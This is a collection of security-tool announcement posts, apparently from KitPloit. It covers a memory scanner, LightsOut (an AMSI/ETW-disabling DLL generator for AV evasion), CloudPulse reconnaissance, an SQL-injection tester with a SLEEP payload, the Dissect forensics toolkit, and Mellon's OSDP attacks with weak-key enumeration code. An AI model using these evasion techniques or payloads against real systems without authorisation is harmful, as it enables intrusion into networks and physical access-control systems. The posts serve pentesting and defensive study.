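    k32.OpenProcess.restype = ctypes.c_void_p
    handle = k32.OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, False, pid)
    mbi, addr = MEMORY_BASIC_INFORMATION(), 0
    while k32.VirtualQueryEx(handle, ctypes.c_void_p(addr), ctypes.byref(mbi), ctypes.sizeof(mbi)):
        if mbi.State == MEM_COMMIT and mbi.Type == MEM_MAPPED and mbi.Protect == PAGE_READWRITE:
            buf = ctypes.create_string_buffer(2)
            read = ctypes.c_size_t(0)
            k32.ReadProcessMemory(handle, ctypes.c_void_p(addr), buf, 2, ctypes.byref(read))
            if buf.raw == b"MZ":  # region starts with a PE header
                yield addr, mbi.RegionSize
        addr += mbi.RegionSize
    k32.CloseHandle(handle)

# for base, size in suspicious_regions(1234):  # hypothetical PID
#     print(hex(base), size)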

The tool starts by scanning the running processes and analyzing the characteristics of the allocated memory regions to detect reflective DLL loading symptoms. Suspicious memory regions which are identified as DLL modules are dumped for further analysis and investigation.
    Furthermore, the tool features the following options:

    • Dump the compromised process.
    • Export a JSON file that provides information about the compromised process, such as the process name, ID, path, size, and base address.
    • Search for specific loaded module by name.

    Example

    python.exe memScanner.py [-h] [-r] [-m MODULE]
    -h, --help show this help message and exit
    -r, --reflectiveScan Looking for reflective DLL loading
-m MODULE, --module MODULE Looking for specific loaded DLL

The script needs administrator privileges in order to inspect all processes.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

    By: Zion3R β€” November 19th 2023 at 11:30


    LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

    LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


    Features currently include:

    • XOR encoding for strings
    • WinAPI function name randomization
    • Multiple sandbox check options
    • Hardware breakpoint bypass option
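To illustrate the string-obfuscation idea from the feature list (a sketch only, not LightsOut's generator), XOR-encoding a string with a random key and emitting it as a C byte array for the stub to decode at runtime might look like this:

import random

def xor_encode(plaintext, key=None):
    # Encode the string with a random single-byte XOR key and emit a C-style array literal
    key = key if key is not None else random.randint(1, 255)
    encoded = bytes(b ^ key for b in plaintext.encode())
    c_array = ", ".join(f"0x{b:02x}" for b in encoded)
    return key, f"unsigned char enc[] = {{ {c_array} }};"

key, c_literal = xor_encode("amsi.dll")
print(f"// key = 0x{key:02x}")
print(c_literal)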
     _______________________
    | |
    | AMSI + ETW |
    | |
    | LIGHTS OUT |
    | _______ |
    | || || |
    | ||_____|| |
    | |/ /|| |
    | / / || |
    | /____/ /-' |
    | |____|/ |
    | |
    | @icyguider |
    | |
    | RG|
    `-----------------------'
    usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

    Generate an obfuscated DLL that will disable AMSI & ETW

    options:
    -h, --help show this help message and exit
    -m <method>, --method <method>
    Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox <option>
    Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
    -sa <value>, --sandbox-arg <value>
    Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
    -k <key>, --key <key>
    Key to encode strings with (randomly generated by default)
    -o <outfile>, --outfile <outfile>
    File to save DLL to

    Remote options:
    -p <pid>, --pid <pid>
    PID of remote process to patch

    Intended Use/Opsec Considerations

    This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

    Usage Examples

You can transfer the output DLL to your target system and load it into powershell in various ways. For example, it can be done via P/Invoke with LoadLibrary:

    Or even easier, copy powershell to an arbitrary location and side load the DLL!

    Greetz/Credit/Further Reference:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CloudPulse - AWS Cloud Landscape Search Engine

    By: Zion3R β€” October 28th 2023 at 11:30


During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him identify possible ways to get into an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse, security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.


It simplifies security assessments with a user-friendly interface and allows you to effortlessly find a company's assets on the AWS cloud:

    • IPs
    • subdomains
    • domains associated with a target
    • organization name
    • discover origin ips

    1- Download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Run docker compose :

    docker-compose up -d

    3- Run script.py script

    docker-compose exec web python script.py

4- Now go to http://:8000/search and enjoy the search engine

    1- download CloudPulse :

    git clone https://github.com/yousseflahouifi/CloudPulse
    cd CloudPulse/

    2- Setup virtual environment :

    python3 -m venv myenv
    source myenv/bin/activate

    3- Install requirements.txt file :

    pip install -r requirements.txt

    4- run an instance of elasticsearch using docker :

    docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

    5- update script.py and settings file to the host 'localhost':

    #script.py
    es = Elasticsearch([{'host': 'localhost', 'port': 9200}])
    #se/settings.py

ELASTICSEARCH_DSL = {
    'default': {
        'hosts': 'localhost:9200'
    },
}

    6- Run script.py to index data in elasticsearch:

    python script.py

    7- Run the app:

    python manage.py runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository, clone the data, and update the data.csv file (the full dataset contains close to 9 million records).

As an example, searching for .mil data gives:

Searching for tesla, as another example, gives:

    CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
    Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    JSpector - A Simple Burp Suite Extension To Crawl JavaScript (JS) Files In Passive Mode And Display The Results Directly On The Issues

    By: Zion3R β€” October 15th 2023 at 11:30


    JSpector is a Burp Suite extension that passively crawls JavaScript files and automatically creates issues with URLs, endpoints and dangerous methods found on the JS files.


    Prerequisites

    Before installing JSpector, you need to have Jython installed on Burp Suite.

    Installation

    1. Download the latest version of JSpector
    2. Open Burp Suite and navigate to the Extensions tab.
    3. Click the Add button in the Installed tab.
    4. In the Extension Details dialog box, select Python as the Extension Type.
    5. Click the Select file button and navigate to the JSpector.py.
    6. Click the Next button.
    7. Once the output shows: "JSpector extension loaded successfully", click the Close button.

    Usage

• Just navigate through your targets and JSpector will passively crawl JS files in the background and automatically return the results in the Dashboard tab.
    • You can export all the results to the clipboard (URLs, endpoints and dangerous methods) with a right click directly on the JS file:



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

    By: Zion3R β€” October 15th 2023 at 00:31


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers, penetration testers and bug bounty hunters to test the security of web applications.


    Disclaimer:

    This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

    The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

    Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

    By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

    Installation

    Install HBSQLI with following steps:

    $ git clone https://github.com/SAPT01/HBSQLI.git
    $ cd HBSQLI
    $ pip3 install -r requirements.txt

    Usage/Examples

    usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

    options:
    -h, --help show this help message and exit
    -l LIST, --list LIST To provide list of urls as an input
    -u URL, --url URL To provide single url as an input
    -p PAYLOADS, --payloads PAYLOADS
    To provide payload file having Blind SQL Payloads with delay of 30 sec
    -H HEADERS, --headers HEADERS
    To provide header file having HTTP Headers which are to be injected
    -v, --verbose Run on verbose mode

    For Single URL:

    $ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

    For List of URLs:

    $ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

    Modes

There are basically two modes: verbose, which shows the whole process as it happens and the status of each test, and non-verbose, which just prints the vulnerable ones on the screen. To initiate verbose mode, just add -v to your command.

    Notes

• You can use the provided payload file or use a custom payload file; just remember that the delay in each payload in the payload file should be set to 30 seconds.

• You can use the provided headers file or add more custom headers to that file according to your needs.
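To illustrate the underlying idea HBSQLI automates (a sketch only, not the tool's code), a header-based time-delay check injects a payload into a single header and flags it if the response takes roughly the payload's delay longer than a baseline request; the URL, header name and payload in the usage comment are placeholders:

import time
import requests

def test_header(url, header_name, payload, delay=30):
    # Compare a baseline request against one carrying the delay payload in the given header
    baseline = requests.get(url, timeout=delay + 15).elapsed.total_seconds()
    start = time.time()
    try:
        requests.get(url, headers={header_name: payload}, timeout=delay + 15)
    except requests.exceptions.ReadTimeout:
        pass
    elapsed = time.time() - start
    return (elapsed - baseline) >= (delay - 2)  # crude threshold for "vulnerable"

# print(test_header("https://target.com", "X-Forwarded-For", "' OR SLEEP(30)-- -"))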

    Demo



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Dissect - Digital Forensics, Incident Response Framework And Toolset That Allows You To Quickly Access And Analyse Forensic Artefacts From Various Disk And File Formats

    By: Zion3R β€” October 5th 2023 at 11:30

    Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).

    This project is a meta package, it will install all other Dissect modules with the right combination of versions. For more information, please see the documentation.


    What is Dissect?

Dissect is an incident response framework built from various parsers and implementations of file formats. Tying this all together, Dissect allows you to work with tools named target-query and target-shell to quickly gain access to forensic artefacts, such as Runkeys, Prefetch files, and Windows Event Logs, just to name a few!

    Singular approach

    And the best thing: all in a singular way, regardless of underlying container (E01, VMDK, QCoW), filesystem (NTFS, ExtFS, FFS), or Operating System (Windows, Linux, ESXi) structure / combination. You no longer have to bother extracting files from your forensic container, mount them (in case of VMDKs and such), retrieve the MFT, and parse it using a separate tool, to finally create a timeline to analyse. This is all handled under the hood by Dissect in a user-friendly manner.

    If we take the example above, you can start analysing parsed MFT entries by just using a command like target-query -f mft <PATH_TO_YOUR_IMAGE>!

    Create a lightweight container using Acquire

    Dissect also provides you with a tool called acquire. You can deploy this tool on endpoint(s) to create a lightweight container of these machine(s). What is convenient as well, is that you can deploy acquire on a hypervisor to quickly create lightweight containers of all the (running) virtual machines on there! All without having to worry about file-locks. These lightweight containers can then be analysed using the tools like target-query and target-shell, but feel free to use other tools as well.

    A modular setup

    Dissect is made with a modular approach in mind. This means that each individual project can be used on its own (or in combination) to create a completely new tool for your engagement or future use!

    Try it out now!

    Interested in trying it out for yourself? You can simply pip install dissect and start using the target-* tooling right away. Or you can use the interactive playground at https://try.dissect.tools to try Dissect in your browser.

    Don’t know where to start? Check out the introduction page.

    Want to get a detailed overview? Check out the overview page.

    Want to read everything? Check out the documentation.

    Projects

    Dissect currently consists of the following projects.

    Related

    These projects are closely related to Dissect, but not installed by this meta package.

    Requirements

    This project is part of the Dissect framework and requires Python.

    Information on the supported Python versions can be found in the Getting Started section of the documentation.

    Installation

    dissect is available on PyPI.

    pip install dissect

    Build and test instructions

    This project uses tox to build source and wheel distributions. Run the following command from the root folder to build these:

    tox -e build

    The build artifacts can be found in the dist/ directory.

    tox is also used to run linting and unit tests in a self-contained environment. To run both linting and unit tests using the default installed Python version, run:

    tox

    For a more elaborate explanation on how to build and test the project, please see the documentation.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Mellon - OSDP Attack Tool

    By: Zion3R β€” October 1st 2023 at 11:30


    OSDP attack tool (and the Elvish word for friend)

    Attack #1: Encryption is Optional

    OSDP supports, but doesn't strictly require, encryption. So your connection might not even be encrypted at all. Attack #1 is just to passively listen and see if you can read the card numbers on the wire.

    Attack #2: Downgrade Attack

    Just because the controller and reader support encryption doesn't mean they're configured to require it be used. An attacker can modify the reader's capability reply message (osdp_PDCAP) to advertise that it doesn't support encryption. When this happens, some controllers will barrel ahead without encryption.

    Attack #3: Install-mode Attack

    OSDP has a quasi-official β€œinstall mode” that applies to both readers and controllers. As the name suggests, it’s supposed to be used when first setting up a reader. What it does is essentially allow readers to ask the controller for what the base encryption key (the SCBK) is. If the controller is configured to be persistently in install-mode, then an attacker can show up on the wire and request the SCBK.

    Attack #4: Weak Keys

OSDP sample code often comes with hardcoded encryption keys. Clearly these are meant to be samples, where the user is supposed to generate keys in a secure way on their own. But this is not explained or made simple for the user. And anyone who's been in security long enough knows that whatever's the default is likely to be there in production.

    So as an attack vector, when the link between reader and controller is encrypted, it’s worth a shot to enumerate some common weak keys. Now these are 128-bit AES keys, so we’re not going to be able to enumerate them all. Or even a meaningful portion of them. But what we can do is hit some common patterns that you see when someone hardcodes a key:

    • All single-byte values. [0x04, 0x04, 0x04, 0x04 …]
    • All monotonically increasing byte values. [0x01, 0x02, 0x03, 0x04, …]
    • All monotonically decreasing byte values. [0x0A, 0x09, 0x08, 0x07, …]
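A minimal sketch of enumerating exactly these three candidate families (illustrative only, not necessarily how attack_osdp.py generates them) is shown below:

def weak_key_candidates():
    # All single-byte values: 16 repetitions of the same byte
    for b in range(256):
        yield bytes([b] * 16)
    # Monotonically increasing byte values, wrapping at 0xFF
    for start in range(256):
        yield bytes((start + i) & 0xFF for i in range(16))
    # Monotonically decreasing byte values, wrapping at 0x00
    for start in range(256):
        yield bytes((start - i) & 0xFF for i in range(16))

print(sum(1 for _ in weak_key_candidates()), "candidate 128-bit keys")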

    Attack #5: Keyset Capture

OSDP has no in-band mechanism for key exchange. What this means is that an attacker can:

    • Insert a covert listening device onto the wire.
    • Break / factory reset / disable the reader.
    • Wait for someone from IT to come and replace the reader.
    • Capture the keyset message (osdp_KEYSET) when the reader is first setup.
    • Decrypt all future messages.

    Getting A Testbed Setup (Linux/MacOS)

You'll find proof-of-concept code for each of these attacks in attack_osdp.py. Check out the --help command for more details on usage. This is a Python script, meant to be run from a laptop with USB<-->RS485 adapters like one of these. So you'll probably want to pick some of those up. It doesn't have to be that model, though.

    If you have a controller you want to test, then great. Use that. If you don't, then we have an intentionally-vulnerable OSDP controller that you can use here: vulnserver.py.

Some of the attacks in attack_osdp.py will expect to be run as a full MitM between a functioning reader and controller. To test these, you might need three USB<-->RS485 adapters, hooked together with a breadboard.

    Additional Medium / Low Risk Issues

    These issues are not, in isolation, exploitable but nonetheless represent a weakening of the protocol, implementation, or overall system.

    • MACs are truncated to 32 bits "to reduce overhead". This is very nearly (but not quite in our calculation) within practical exploitable range.
    • IVs (which are derived from MACs) are similarly reduced to 32 bits of entropy. This will cause IV reuse, which is a big red flag for a protocol.
    • Session keys are only generated using 48 bits of entropy from the controller RNG nonce. This appears to not be possible for an observing attacker to enumerate offline, however. (Unless we're missing something, in which case this would become a critical issue.)
    • Sequence numbers consist of only 2 bits, not providing sufficient liveness.
    • CBC-mode encryption is used. GCM would be a more modern block cipher mode appropriate for network protocols.
    • SCS modes 15 & 16 are essentially "null ciphers", and should not exist. They don't encrypt data.
    • The OSDP command byte is always unencrypted, even in the middle of a Secure Channel session. This is a huge benefit to attackers, making attack tools much easier to write. It means that an attacker can always see what "type" of packet is being sent, even if it's otherwise encrypted. Attackers can tell when people badge in, when the LED lights up, etc... This is not information that should be in plaintext.
    • SCBK-D (a hardcoded "default" encryption key) provides no security and should be removed. It serves only to obfuscate and provide a false sense of security.

